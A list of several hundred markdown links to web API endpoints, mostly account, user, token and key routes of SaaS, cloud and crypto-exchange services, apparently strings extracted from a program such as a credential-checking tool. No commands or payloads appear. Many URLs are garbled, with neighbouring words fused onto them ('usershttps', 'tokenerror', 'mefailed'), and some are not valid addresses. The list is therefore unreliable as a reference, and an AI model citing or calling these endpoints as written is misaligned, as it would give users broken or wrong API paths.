[https://api.twitter.com/2/tweets/20https](https%3A%2F%2Fapi.twitter.com%2F2%2Ftweets%2F20https)
[https://api4.nozbe.com/v1/api/usershttps](https%3A%2F%2Fapi4.nozbe.com%2Fv1%2Fapi%2Fusershttps)
[https://apiv2.allsportsapi.com/football/](https%3A%2F%2Fapiv2.allsportsapi.com%2Ffootball%2F)
[https://app.atera.com/api/v3/alertshttps](https%3A%2F%2Fapp.atera.com%2Fapi%2Fv3%2Falertshttps)
[https://app.tmetric.com/api/v3/userhttps](https%3A%2F%2Fapp.tmetric.com%2Fapi%2Fv3%2Fuserhttps)
[https://auth.app.wiz.io/oauth/tokenerror](https%3A%2F%2Fauth.app.wiz.io%2Foauth%2Ftokenerror)
[https://auth.dfuse.io/v1/auth/issuehttps](https%3A%2F%2Fauth.dfuse.io%2Fv1%2Fauth%2Fissuehttps)
[https://calendarific.com/api/v2/holidays](https%3A%2F%2Fcalendarific.com%2Fapi%2Fv2%2Fholidays)
[https://canny.io/api/v1/boards/listhttps](https%3A%2F%2Fcanny.io%2Fapi%2Fv1%2Fboards%2Flisthttps)
[https://dev.lunchmoney.app/v1/categories](https%3A%2F%2Fdev.lunchmoney.app%2Fv1%2Fcategories)
[https://docs.stripe.com/api/charges/list](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fcharges%2Flist)
[https://docs.stripe.com/api/coupons/list](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fcoupons%2Flist)
[https://docs.stripe.com/api/payouts/list](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fpayouts%2Flist)
[https://docs.stripe.com/api/tax_ids/list](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Ftax_ids%2Flist)
[https://github.com/login/device/codeDiff](https%3A%2F%2Fgithub.com%2Flogin%2Fdevice%2FcodeDiff)
[https://go.postman.co/environments/could](https%3A%2F%2Fgo.postman.co%2Fenvironments%2Fcould)
[https://gtmetrix.com/api/2.0/statushttps](https%3A%2F%2Fgtmetrix.com%2Fapi%2F2.0%2Fstatushttps)
[https://huggingface.co/api/modelsparsing](https%3A%2F%2Fhuggingface.co%2Fapi%2Fmodelsparsing)
[https://iam.googleapis.com/v1/roleshttps](https%3A%2F%2Fiam.googleapis.com%2Fv1%2Froleshttps)
[https://management.core.cloudapi.de/data](https%3A%2F%2Fmanagement.core.cloudapi.de%2Fdata)
[https://service.zipapi.us/zipcode/90210/](https%3A%2F%2Fservice.zipapi.us%2Fzipcode%2F90210%2F)
[https://simfin.com/api/v2/companies/list](https%3A%2F%2Fsimfin.com%2Fapi%2Fv2%2Fcompanies%2Flist)
[https://typetalk.com/oauth2/access_token](https%3A%2F%2Ftypetalk.com%2Foauth2%2Faccess_token)
[https://vault.microsoftazure.de/specific](https%3A%2F%2Fvault.microsoftazure.de%2Fspecific)
[https://www.gocanvas.com/apiv2/forms.xml](https%3A%2F%2Fwww.gocanvas.com%2Fapiv2%2Fforms.xml)
[https://www.parsehub.com/api/v2/projects](https%3A%2F%2Fwww.parsehub.com%2Fapi%2Fv2%2Fprojects)
[http://www.w3.org/XML/1998/namespacexml](http%3A%2F%2Fwww.w3.org%2FXML%2F1998%2Fnamespacexml)
[https://a.klaviyo.com/api/profileshttps](https%3A%2F%2Fa.klaviyo.com%2Fapi%2Fprofileshttps)
[https://api.bannerbear.com/v2/authhttps](https%3A%2F%2Fapi.bannerbear.com%2Fv2%2Fauthhttps)
[https://api.bombbomb.com/v2/lists/https](https%3A%2F%2Fapi.bombbomb.com%2Fv2%2Flists%2Fhttps)
[https://api.chartmogul.com/v1/pinghttps](https%3A%2F%2Fapi.chartmogul.com%2Fv1%2Fpinghttps)
[https://api.clarifai.com/v2/inputshttps](https%3A%2F%2Fapi.clarifai.com%2Fv2%2Finputshttps)
[https://api.codemagic.io/appsunexpected](https%3A%2F%2Fapi.codemagic.io%2Fappsunexpected)
[https://api.currencyscoop.com/v1/latest](https%3A%2F%2Fapi.currencyscoop.com%2Fv1%2Flatest)
[https://api.dandelion.eu/datatxt/li/v1/](https%3A%2F%2Fapi.dandelion.eu%2Fdatatxt%2Fli%2Fv1%2F)
[https://api.github.com/user/interaction](https%3A%2F%2Fapi.github.com%2Fuser%2Finteraction)
[https://api.ipstack.com/134.201.250.155](https%3A%2F%2Fapi.ipstack.com%2F134.201.250.155)
[https://api.languagelayer.com/languages](https%3A%2F%2Fapi.languagelayer.com%2Flanguages)
[https://api.luno.com/api/1/balancehttps](https%3A%2F%2Fapi.luno.com%2Fapi%2F1%2Fbalancehttps)
[https://api.mailgun.net/v3/domainshttps](https%3A%2F%2Fapi.mailgun.net%2Fv3%2Fdomainshttps)
[https://api.nightfall.ai/v3/uploadhttps](https%3A%2F%2Fapi.nightfall.ai%2Fv3%2Fuploadhttps)
[https://api.rownd.io/applications/https](https%3A%2F%2Fapi.rownd.io%2Fapplications%2Fhttps)
[https://api.semaphore.co/api/v4/account](https%3A%2F%2Fapi.semaphore.co%2Fapi%2Fv4%2Faccount)
[https://api.signable.co.uk/v1/templates](https%3A%2F%2Fapi.signable.co.uk%2Fv1%2Ftemplates)
[https://api.statuspage.io/v1/pageshttps](https%3A%2F%2Fapi.statuspage.io%2Fv1%2Fpageshttps)
[https://api.stockdata.org/v1/data/quote](https%3A%2F%2Fapi.stockdata.org%2Fv1%2Fdata%2Fquote)
[https://api.stripe.com/v1/account_links](https%3A%2F%2Fapi.stripe.com%2Fv1%2Faccount_links)
[https://api.stripe.com/v1/payment_links](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fpayment_links)
[https://api.stripe.com/v1/subscriptions](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fsubscriptions)
[https://api.supernotes.app/v1/userhttps](https%3A%2F%2Fapi.supernotes.app%2Fv1%2Fuserhttps)
[https://api.tailscale.com/api/v2/secret](https%3A%2F%2Fapi.tailscale.com%2Fapi%2Fv2%2Fsecret)
[https://api.testingbot.com/v1/userhttps](https%3A%2F%2Fapi.testingbot.com%2Fv1%2Fuserhttps)
[https://api.zeplin.dev/v1/users/meerror](https%3A%2F%2Fapi.zeplin.dev%2Fv1%2Fusers%2Fmeerror)
[https://api2.autopilothq.com/v1/account](https%3A%2F%2Fapi2.autopilothq.com%2Fv1%2Faccount)
[https://api2.frontapp.com/accountshttps](https%3A%2F%2Fapi2.frontapp.com%2Faccountshttps)
[https://app.klipfolio.com/api/1.0/users](https%3A%2F%2Fapp.klipfolio.com%2Fapi%2F1.0%2Fusers)
[https://app.surveybot.io/api/v1/surveys](https%3A%2F%2Fapp.surveybot.io%2Fapi%2Fv1%2Fsurveys)
[https://content.guardianapis.com/search](https%3A%2F%2Fcontent.guardianapis.com%2Fsearch)
[https://database.usgovcloudapi.net/data](https%3A%2F%2Fdatabase.usgovcloudapi.net%2Fdata)
[https://docs.stripe.com/api/events/list](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fevents%2Flist)
[https://docs.stripe.com/api/prices/list](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fprices%2Flist)
[https://docs.stripe.com/api/quotes/list](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fquotes%2Flist)
[https://docs.stripe.com/api/topups/list](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Ftopups%2Flist)
[https://getsandbox.com/api/1/sandboxes/](https%3A%2F%2Fgetsandbox.com%2Fapi%2F1%2Fsandboxes%2F)
[https://gitlab.com/api/v4/metadatahttps](https%3A%2F%2Fgitlab.com%2Fapi%2Fv4%2Fmetadatahttps)
[https://gitlab.com/api/v4/projectshttps](https%3A%2F%2Fgitlab.com%2Fapi%2Fv4%2Fprojectshttps)
[https://hg.mozilla.org/releases/mozilla](https%3A%2F%2Fhg.mozilla.org%2Freleases%2Fmozilla)
[https://pkg.go.dev/go.mongodb.org/mongo](https%3A%2F%2Fpkg.go.dev%2Fgo.mongodb.org%2Fmongo)
[https://sms.8x8.com/api/v1/subaccounts/](https%3A%2F%2Fsms.8x8.com%2Fapi%2Fv1%2Fsubaccounts%2F)
[https://sts.UNIVERSE_DOMAIN/v1/tokenurn](https%3A%2F%2Fsts.UNIVERSE_DOMAIN%2Fv1%2Ftokenurn)
[https://verifier.meetchopra.com/verify/](https%3A%2F%2Fverifier.meetchopra.com%2Fverify%2F)
[https://verify.twilio.com/v2/Servicesif](https%3A%2F%2Fverify.twilio.com%2Fv2%2FServicesif)
[https://www.postman.com/_api/workspace/](https%3A%2F%2Fwww.postman.com%2F_api%2Fworkspace%2F)
[https://www.strava.com/oauth/tokenhttps](https%3A%2F%2Fwww.strava.com%2Foauth%2Ftokenhttps)
[https://api.abuseipdb.com/api/v2/check](https%3A%2F%2Fapi.abuseipdb.com%2Fapi%2Fv2%2Fcheck)
[https://api.airvisual.com/v2/countries](https%3A%2F%2Fapi.airvisual.com%2Fv2%2Fcountries)
[https://api.apiflash.com/v1/urltoimage](https%3A%2F%2Fapi.apiflash.com%2Fv1%2Furltoimage)
[https://api.calendly.com/users/mehttps](https%3A%2F%2Fapi.calendly.com%2Fusers%2Fmehttps)
[https://api.chec.io/v1/categorieshttps](https%3A%2F%2Fapi.chec.io%2Fv1%2Fcategorieshttps)
[https://api.coinlayer.com/api/livelive](https%3A%2F%2Fapi.coinlayer.com%2Fapi%2Flivelive)
[https://api.confluent.cloud/iam/v2/api](https%3A%2F%2Fapi.confluent.cloud%2Fiam%2Fv2%2Fapi)
[https://api.dyspatch.io/templateshttps](https%3A%2F%2Fapi.dyspatch.io%2Ftemplateshttps)
[https://api.gemini.com/v1/accounthttps](https%3A%2F%2Fapi.gemini.com%2Fv1%2Faccounthttps)
[https://api.getpostman.com/workspaces/](https%3A%2F%2Fapi.getpostman.com%2Fworkspaces%2F)
[https://api.groovehq.com/v1/meexpected](https%3A%2F%2Fapi.groovehq.com%2Fv1%2Fmeexpected)
[https://api.harvestapp.com/v2/users/me](https%3A%2F%2Fapi.harvestapp.com%2Fv2%2Fusers%2Fme)
[https://api.keen.io/3.0/organizations/](https%3A%2F%2Fapi.keen.io%2F3.0%2Forganizations%2F)
[https://api.newrelic.com/v2/users.json](https%3A%2F%2Fapi.newrelic.com%2Fv2%2Fusers.json)
[https://api.ngc.nvidia.com/v3/keys/get](https%3A%2F%2Fapi.ngc.nvidia.com%2Fv3%2Fkeys%2Fget)
[https://api.openai.com/v1/threadshttps](https%3A%2F%2Fapi.openai.com%2Fv1%2Fthreadshttps)
[https://api.paperform.co/v1/formshttps](https%3A%2F%2Fapi.paperform.co%2Fv1%2Fformshttps)
[https://api.salesflare.com/me/contacts](https%3A%2F%2Fapi.salesflare.com%2Fme%2Fcontacts)
[https://api.scrapingant.com/v1/general](https%3A%2F%2Fapi.scrapingant.com%2Fv1%2Fgeneral)
[https://api.serphouse.com/account/info](https%3A%2F%2Fapi.serphouse.com%2Faccount%2Finfo)
[https://api.siteleaf.com/v2/siteshttps](https%3A%2F%2Fapi.siteleaf.com%2Fv2%2Fsiteshttps)
[https://api.statuscake.com/v1/sslhttps](https%3A%2F%2Fapi.statuscake.com%2Fv1%2Fsslhttps)
[https://api.stripe.com/v1/tax/settings](https%3A%2F%2Fapi.stripe.com%2Fv1%2Ftax%2Fsettings)
[https://api.teamgate.com/v4/usershttps](https%3A%2F%2Fapi.teamgate.com%2Fv4%2Fusershttps)
[https://api.uplead.com/v2/creditshttps](https%3A%2F%2Fapi.uplead.com%2Fv2%2Fcreditshttps)
[https://api.uploadcare.com/files/https](https%3A%2F%2Fapi.uploadcare.com%2Ffiles%2Fhttps)
[https://api.upwave.io/workspaces/https](https%3A%2F%2Fapi.upwave.io%2Fworkspaces%2Fhttps)
[https://api.voodoosms.com/creditsError](https%3A%2F%2Fapi.voodoosms.com%2FcreditsError)
[https://api.youneedabudget.com/v1/user](https%3A%2F%2Fapi.youneedabudget.com%2Fv1%2Fuser)
[https://api.zerobounce.net/v1/activity](https%3A%2F%2Fapi.zerobounce.net%2Fv1%2Factivity)
[https://app.loadmill.com/api/v1/labels](https%3A%2F%2Fapp.loadmill.com%2Fapi%2Fv1%2Flabels)
[https://besttime.app/api/v1/keys/https](https%3A%2F%2Fbesttime.app%2Fapi%2Fv1%2Fkeys%2Fhttps)
[https://customer.guru/export/customers](https%3A%2F%2Fcustomer.guru%2Fexport%2Fcustomers)
[https://discord.com/api/v8/users/https](https%3A%2F%2Fdiscord.com%2Fapi%2Fv8%2Fusers%2Fhttps)
[https://discord.com/api/webhooks/https](https%3A%2F%2Fdiscord.com%2Fapi%2Fwebhooks%2Fhttps)
[https://graphql.us.jupiterone.io/https](https%3A%2F%2Fgraphql.us.jupiterone.io%2Fhttps)
[https://host.io/api/domains/ip/8.8.8.8](https%3A%2F%2Fhost.io%2Fapi%2Fdomains%2Fip%2F8.8.8.8)
[https://index.docker.io/v1/Unreachable](https%3A%2F%2Findex.docker.io%2Fv1%2FUnreachable)
[https://login.microsoftonline.us/https](https%3A%2F%2Flogin.microsoftonline.us%2Fhttps)
[https://mailsac.com/api/addresseshttps](https%3A%2F%2Fmailsac.com%2Fapi%2Faddresseshttps)
[https://manage.chinacloudapi.com/https](https%3A%2F%2Fmanage.chinacloudapi.com%2Fhttps)
[https://my.demio.com/api/v1/ping/query](https%3A%2F%2Fmy.demio.com%2Fapi%2Fv1%2Fping%2Fquery)
[https://onesignal.com/api/v1/appshttps](https%3A%2F%2Fonesignal.com%2Fapi%2Fv1%2Fappshttps)
[https://sentry.io/api/0/projects/https](https%3A%2F%2Fsentry.io%2Fapi%2F0%2Fprojects%2Fhttps)
[https://sms.api.sinch.com/xms/v1/https](https%3A%2F%2Fsms.api.sinch.com%2Fxms%2Fv1%2Fhttps)
[https://trk.mtrl.me/categoryunexpected](https%3A%2F%2Ftrk.mtrl.me%2Fcategoryunexpected)
[https://uploads.github.com//dependency](https%3A%2F%2Fuploads.github.com%2F%2Fdependency)
[http://portal.microsoftazure.de/https](http%3A%2F%2Fportal.microsoftazure.de%2Fhttps)
[https://anypointapi2cartapiflashBasic](https%3A%2F%2Fanypointapi2cartapiflashBasic)
[https://api.aletheiaapi.com/StockData](https%3A%2F%2Fapi.aletheiaapi.com%2FStockData)
[https://api.borgbase.com/graphqlhttps](https%3A%2F%2Fapi.borgbase.com%2Fgraphqlhttps)
[https://api.close.com/api/v1/me/https](https%3A%2F%2Fapi.close.com%2Fapi%2Fv1%2Fme%2Fhttps)
[https://api.cloudplan.biz/api/user/me](https%3A%2F%2Fapi.cloudplan.biz%2Fapi%2Fuser%2Fme)
[https://api.coinbase.com/v2/userhttps](https%3A%2F%2Fapi.coinbase.com%2Fv2%2Fuserhttps)
[https://api.currencyfreaks.com/latest](https%3A%2F%2Fapi.currencyfreaks.com%2Flatest)
[https://api.endorlabs.com/v1/auth/api](https%3A%2F%2Fapi.endorlabs.com%2Fv1%2Fauth%2Fapi)
[https://api.everhour.com/clientshttps](https%3A%2F%2Fapi.everhour.com%2Fclientshttps)
[https://api.exportsdk.com/v1/pdfhttps](https%3A%2F%2Fapi.exportsdk.com%2Fv1%2Fpdfhttps)
[https://api.fleetbase.io/v1/contacts/](https%3A%2F%2Fapi.fleetbase.io%2Fv1%2Fcontacts%2F)
[https://api.gocardless.com/customers/](https%3A%2F%2Fapi.gocardless.com%2Fcustomers%2F)
[https://api.groq.com/openai/v1/models](https%3A%2F%2Fapi.groq.com%2Fopenai%2Fv1%2Fmodels)
[https://api.imagekit.io/v1/fileshttps](https%3A%2F%2Fapi.imagekit.io%2Fv1%2Ffileshttps)
[https://api.knapsackpro.com/v1/builds](https%3A%2F%2Fapi.knapsackpro.com%2Fv1%2Fbuilds)
[https://api.kylas.io/v1/contactshttps](https%3A%2F%2Fapi.kylas.io%2Fv1%2Fcontactshttps)
[https://api.lemlist.com/api/teamhttps](https%3A%2F%2Fapi.lemlist.com%2Fapi%2Fteamhttps)
[https://api.miro.com/v1/users/mehttps](https%3A%2F%2Fapi.miro.com%2Fv1%2Fusers%2Fmehttps)
[https://api.moosend.com/v3/lists.json](https%3A%2F%2Fapi.moosend.com%2Fv3%2Flists.json)
[https://api.paystack.co/customerhttps](https%3A%2F%2Fapi.paystack.co%2Fcustomerhttps)
[https://api.pollsapi.com/v1/get/polls](https%3A%2F%2Fapi.pollsapi.com%2Fv1%2Fget%2Fpolls)
[https://api.runscope.com/accounthttps](https%3A%2F%2Fapi.runscope.com%2Faccounthttps)
[https://api.sendinblue.com/v3/account](https%3A%2F%2Fapi.sendinblue.com%2Fv3%2Faccount)
[https://api.simplesat.io/api/answers/](https%3A%2F%2Fapi.simplesat.io%2Fapi%2Fanswers%2F)
[https://api.stripe.com/v1/chargesx509](https%3A%2F%2Fapi.stripe.com%2Fv1%2Fchargesx509)
[https://api.vultr.com/v2/accounterror](https%3A%2F%2Fapi.vultr.com%2Fv2%2Faccounterror)
[https://app.goflightlabs.com/airports](https%3A%2F%2Fapp.goflightlabs.com%2Fairports)
[https://app.zenserp.com/api/v2/search](https%3A%2F%2Fapp.zenserp.com%2Fapi%2Fv2%2Fsearch)
[https://blitapp.com/api/apps/allhttps](https%3A%2F%2Fblitapp.com%2Fapi%2Fapps%2Fallhttps)
[https://checkvist.com/auth/login.json](https%3A%2F%2Fcheckvist.com%2Fauth%2Flogin.json)
[https://circleci.com/api/v1.1/invalid](https%3A%2F%2Fcircleci.com%2Fapi%2Fv1.1%2Finvalid)
[https://fetchrss.com/api/v1/feed/list](https%3A%2F%2Ffetchrss.com%2Fapi%2Fv1%2Ffeed%2Flist)
[https://gitlab.com/org/repo.gitNumber](https%3A%2F%2Fgitlab.com%2Forg%2Frepo.gitNumber)
[https://go.postman.co/workspace/could](https%3A%2F%2Fgo.postman.co%2Fworkspace%2Fcould)
[https://graphhopper.com/api/1/geocode](https%3A%2F%2Fgraphhopper.com%2Fapi%2F1%2Fgeocode)
[https://linkedin.com/in/williamhgates](https%3A%2F%2Flinkedin.com%2Fin%2Fwilliamhgates)
[https://login.microsoftonline.de/2006](https%3A%2F%2Flogin.microsoftonline.de%2F2006)
[https://mainnet.infura.io/v3/KNAPSACK](https%3A%2F%2Fmainnet.infura.io%2Fv3%2FKNAPSACK)
[https://manage.windowsazure.com/https](https%3A%2F%2Fmanage.windowsazure.com%2Fhttps)
[https://paydirtapp.com/api/v1/clients](https%3A%2F%2Fpaydirtapp.com%2Fapi%2Fv1%2Fclients)
[https://percy.io/api/v1/projectshttps](https%3A%2F%2Fpercy.io%2Fapi%2Fv1%2Fprojectshttps)
[https://plugin.api.dronahq.com/users/](https%3A%2F%2Fplugin.api.dronahq.com%2Fusers%2F)
[https://protobuf.dev/reference/go/faq](https%3A%2F%2Fprotobuf.dev%2Freference%2Fgo%2Ffaq)
[https://ps.pndsn.com/v2/objects/https](https%3A%2F%2Fps.pndsn.com%2Fv2%2Fobjects%2Fhttps)
[https://www.apilayer.net/api/validate](https%3A%2F%2Fwww.apilayer.net%2Fapi%2Fvalidate)
[https://www.flickr.com/services/rest/](https%3A%2F%2Fwww.flickr.com%2Fservices%2Frest%2F)
[https://www.googleapis.com/auth/cloud](https%3A%2F%2Fwww.googleapis.com%2Fauth%2Fcloud)
[https://yourdomain.com/samplecallback](https%3A%2F%2Fyourdomain.com%2Fsamplecallback)
[https://api.appcues.com/v2/accounts/](https%3A%2F%2Fapi.appcues.com%2Fv2%2Faccounts%2F)
[https://api.chatbot.com/storieshttps](https%3A%2F%2Fapi.chatbot.com%2Fstorieshttps)
[https://api.deepgram.com/v1/projects](https%3A%2F%2Fapi.deepgram.com%2Fv1%2Fprojects)
[https://api.docparser.com/v1/parsers](https%3A%2F%2Fapi.docparser.com%2Fv1%2Fparsers)
[https://api.flat.io/v2/meapplication](https%3A%2F%2Fapi.flat.io%2Fv2%2Fmeapplication)
[https://api.geocodify.com/v2/geocode](https%3A%2F%2Fapi.geocodify.com%2Fv2%2Fgeocode)
[https://api.github.com/graphqlfailed](https%3A%2F%2Fapi.github.com%2Fgraphqlfailed)
[https://api.honeycomb.io/1/authhttps](https%3A%2F%2Fapi.honeycomb.io%2F1%2Fauthhttps)
[https://api.hunter.io/v2/leads_lists](https%3A%2F%2Fapi.hunter.io%2Fv2%2Fleads_lists)
[https://api.imagga.com/v2/usagehttps](https%3A%2F%2Fapi.imagga.com%2Fv2%2Fusagehttps)
[https://api.ipapi.com/49.146.239.251](https%3A%2F%2Fapi.ipapi.com%2F49.146.239.251)
[https://api.madkudu.com/v1/pinghttps](https%3A%2F%2Fapi.madkudu.com%2Fv1%2Fpinghttps)
[https://api.notion.com/v1/usershttps](https%3A%2F%2Fapi.notion.com%2Fv1%2Fusershttps)
[https://api.omnisend.com/v3/contacts](https%3A%2F%2Fapi.omnisend.com%2Fv3%2Fcontacts)
[https://api.pagerduty.com/usershttps](https%3A%2F%2Fapi.pagerduty.com%2Fusershttps)
[https://api.pandascore.co/videogames](https%3A%2F%2Fapi.pandascore.co%2Fvideogames)
[https://api.pdflayer.com/api/convert](https%3A%2F%2Fapi.pdflayer.com%2Fapi%2Fconvert)
[https://api.prodpad.com/v1/tagshttps](https%3A%2F%2Fapi.prodpad.com%2Fv1%2Ftagshttps)
[https://api.weatherstack.com/current](https%3A%2F%2Fapi.weatherstack.com%2Fcurrent)
[https://app.lendflow.io/api/v1/deals](https%3A%2F%2Fapp.lendflow.io%2Fapi%2Fv1%2Fdeals)
[https://app.satismeter.com/api/users](https%3A%2F%2Fapp.satismeter.com%2Fapi%2Fusers)
[https://axonaut.com/api/v2/companies](https%3A%2F%2Faxonaut.com%2Fapi%2Fv2%2Fcompanies)
[https://batch.core.windows.net/https](https%3A%2F%2Fbatch.core.windows.net%2Fhttps)
[https://cloud.bitbar.com/api/mehttps](https%3A%2F%2Fcloud.bitbar.com%2Fapi%2Fmehttps)
[https://cloud.drone.io/api/userhttps](https%3A%2F%2Fcloud.drone.io%2Fapi%2Fuserhttps)
[https://connect.squareup.com/v2/team](https%3A%2F%2Fconnect.squareup.com%2Fv2%2Fteam)
[https://docs.airbrake.io/docs/devops](https%3A%2F%2Fdocs.airbrake.io%2Fdocs%2Fdevops)
[https://geo.ipify.org/api/v2/country](https%3A%2F%2Fgeo.ipify.org%2Fapi%2Fv2%2Fcountry)
[https://github.com/airbrake/airbrake](https%3A%2F%2Fgithub.com%2Fairbrake%2Fairbrake)
[https://go.postman.co/collection/tls](https%3A%2F%2Fgo.postman.co%2Fcollection%2Ftls)
[https://graph.chinacloudapi.cn/https](https%3A%2F%2Fgraph.chinacloudapi.cn%2Fhttps)
[https://login.chinacloudapi.cn/https](https%3A%2F%2Flogin.chinacloudapi.cn%2Fhttps)
[https://manage.windowsazure.us/https](https%3A%2F%2Fmanage.windowsazure.us%2Fhttps)
[https://poloniex.com/tradingApihttps](https%3A%2F%2Fpoloniex.com%2FtradingApihttps)
[https://servicebus.cloudapi.de/https](https%3A%2F%2Fservicebus.cloudapi.de%2Fhttps)
[https://servicebus.windows.net/https](https%3A%2F%2Fservicebus.windows.net%2Fhttps)
[https://snyk.io/api/v1/user/mefailed](https%3A%2F%2Fsnyk.io%2Fapi%2Fv1%2Fuser%2Fmefailed)
[https://sourcegraph.com/.api/graphql](https%3A%2F%2Fsourcegraph.com%2F.api%2Fgraphql)
[https://vault.usgovcloudapi.nethttps](https%3A%2F%2Fvault.usgovcloudapi.nethttps)
[https://api.alegra.com/api/v1/users](https%3A%2F%2Fapi.alegra.com%2Fapi%2Fv1%2Fusers)
[https://api.ambeedata.com/latest/by](https%3A%2F%2Fapi.ambeedata.com%2Flatest%2Fby)
[https://api.audd.io/setCallbackUrl/](https%3A%2F%2Fapi.audd.io%2FsetCallbackUrl%2F)
[https://api.aylien.com/news/stories](https%3A%2F%2Fapi.aylien.com%2Fnews%2Fstories)
[https://api.buildkite.com/v2/access](https%3A%2F%2Fapi.buildkite.com%2Fv2%2Faccess)
[https://api.buttercms.com/v2/posts/](https%3A%2F%2Fapi.buttercms.com%2Fv2%2Fposts%2F)
[https://api.captaindata.co/v2/https](https%3A%2F%2Fapi.captaindata.co%2Fv2%2Fhttps)
[https://api.checklyhq.com/v1/checks](https%3A%2F%2Fapi.checklyhq.com%2Fv1%2Fchecks)
[https://api.cliengo.com/1.0/account](https%3A%2F%2Fapi.cliengo.com%2F1.0%2Faccount)
[https://api.convertkit.com/v3/forms](https%3A%2F%2Fapi.convertkit.com%2Fv3%2Fforms)
[https://api.countrylayer.com/v2/all](https%3A%2F%2Fapi.countrylayer.com%2Fv2%2Fall)
[https://api.courier.com/preferences](https%3A%2F%2Fapi.courier.com%2Fpreferences)
[https://api.feedier.com/v1/carriers](https%3A%2F%2Fapi.feedier.com%2Fv1%2Fcarriers)
[https://api.gengo.com/v2/account/me](https%3A%2F%2Fapi.gengo.com%2Fv2%2Faccount%2Fme)
[https://api.gumroad.com/v2/products](https%3A%2F%2Fapi.gumroad.com%2Fv2%2Fproducts)
[https://api.hybiscus.dev/api/v1/get](https%3A%2F%2Fapi.hybiscus.dev%2Fapi%2Fv1%2Fget)
[https://api.intra.42.fr/oauth/token](https%3A%2F%2Fapi.intra.42.fr%2Foauth%2Ftoken)
[https://api.linear.app/graphqlhttps](https%3A%2F%2Fapi.linear.app%2Fgraphqlhttps)
[https://api.opsgenie.com/v2/account](https%3A%2F%2Fapi.opsgenie.com%2Fv2%2Faccount)
[https://api.opsgenie.com/v2/alerts/](https%3A%2F%2Fapi.opsgenie.com%2Fv2%2Falerts%2F)
[https://api.reply.io/v1/peoplehttps](https%3A%2F%2Fapi.reply.io%2Fv1%2Fpeoplehttps)
[https://api.scrapeowl.com/v1/scrape](https%3A%2F%2Fapi.scrapeowl.com%2Fv1%2Fscrape)
[https://api.smooch.io/v2/appsunable](https%3A%2F%2Fapi.smooch.io%2Fv2%2Fappsunable)
[https://api.speechtext.ai/recognize](https%3A%2F%2Fapi.speechtext.ai%2Frecognize)
[https://api.storychief.io/1.0/users](https%3A%2F%2Fapi.storychief.io%2F1.0%2Fusers)
[https://api.stripe.com/v1/tax_rates](https%3A%2F%2Fapi.stripe.com%2Fv1%2Ftax_rates)
[https://api.stripe.com/v1/transfers](https%3A%2F%2Fapi.stripe.com%2Fv1%2Ftransfers)
[https://api.trello.com/1/members/me](https%3A%2F%2Fapi.trello.com%2F1%2Fmembers%2Fme)
[https://api.vbout.com/1/app/me.json](https%3A%2F%2Fapi.vbout.com%2F1%2Fapp%2Fme.json)
[https://app.circleci.com/pipelines/](https%3A%2F%2Fapp.circleci.com%2Fpipelines%2F)
[https://app.scrapingbee.com/api/v1/](https%3A%2F%2Fapp.scrapingbee.com%2Fapi%2Fv1%2F)
[https://circleci.com/api/v2/mehttps](https%3A%2F%2Fcircleci.com%2Fapi%2Fv2%2Fmehttps)
[https://clustdoc.com/api/usershttps](https%3A%2F%2Fclustdoc.com%2Fapi%2Fusershttps)
[https://codequiry.com/api/v1/checks](https%3A%2F%2Fcodequiry.com%2Fapi%2Fv1%2Fchecks)
[https://dash.readme.com/api/v1https](https%3A%2F%2Fdash.readme.com%2Fapi%2Fv1https)
[https://docs.stripe.com/api/balance](https%3A%2F%2Fdocs.stripe.com%2Fapi%2Fbalance)
[https://formcrafts.com/api/v1/https](https%3A%2F%2Fformcrafts.com%2Fapi%2Fv1%2Fhttps)
[https://go.postman.co/example/error](https%3A%2F%2Fgo.postman.co%2Fexample%2Ferror)
[https://go.postman.co/request/https](https%3A%2F%2Fgo.postman.co%2Frequest%2Fhttps)
[https://httpbin.org/status/200https](https%3A%2F%2Fhttpbin.org%2Fstatus%2F200https)
[https://selectpdf.com/api2/convert/](https%3A%2F%2Fselectpdf.com%2Fapi2%2Fconvert%2F)
[https://trading.robinhood.com/https](https%3A%2F%2Ftrading.robinhood.com%2Fhttps)
[https://urlscan.io/user/quotashttps](https%3A%2F%2Furlscan.io%2Fuser%2Fquotashttps)
[https://vault.microsoftazure.dedata](https%3A%2F%2Fvault.microsoftazure.dedata)
[https://www.tefter.io/api/bookmarks](https%3A%2F%2Fwww.tefter.io%2Fapi%2Fbookmarks)
[http://169.254.169.254/latest/meta](http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta)
[http://addEventListenerresponsible](http%3A%2F%2FaddEventListenerresponsible)
[http://www.opengis.net/gml/3.3/exr](http%3A%2F%2Fwww.opengis.net%2Fgml%2F3.3%2Fexr)
[https://api.apitemplate.io/v1/list](https%3A%2F%2Fapi.apitemplate.io%2Fv1%2Flist)
[https://api.brandfetch.io/v1/color](https%3A%2F%2Fapi.brandfetch.io%2Fv1%2Fcolor)
[https://api.currencylayer.com/live](https%3A%2F%2Fapi.currencylayer.com%2Flive)
[https://api.diffbot.com/v4/account](https%3A%2F%2Fapi.diffbot.com%2Fv4%2Faccount)
[https://api.doppler.com/v3/mehttps](https%3A%2F%2Fapi.doppler.com%2Fv3%2Fmehttps)
[https://api.envoy.com/v1/locations](https%3A%2F%2Fapi.envoy.com%2Fv1%2Flocations)
[https://api.fullstory.com/v2/users](https%3A%2F%2Fapi.fullstory.com%2Fv2%2Fusers)
[https://api.geocod.io/v1.6/geocode](https%3A%2F%2Fapi.geocod.io%2Fv1.6%2Fgeocode)
[https://api.goodday.work/2.0/users](https%3A%2F%2Fapi.goodday.work%2F2.0%2Fusers)
[https://api.ipgeolocation.io/ipgeo](https%3A%2F%2Fapi.ipgeolocation.io%2Fipgeo)
[https://api.marketstack.com/v1/eod](https%3A%2F%2Fapi.marketstack.com%2Fv1%2Feod)
[https://api.mediastack.com/v1/news](https%3A%2F%2Fapi.mediastack.com%2Fv1%2Fnews)
[https://api.mockaroo.com/api/types](https%3A%2F%2Fapi.mockaroo.com%2Fapi%2Ftypes)
[https://api.parseur.com/postgresql](https%3A%2F%2Fapi.parseur.com%2Fpostgresql)
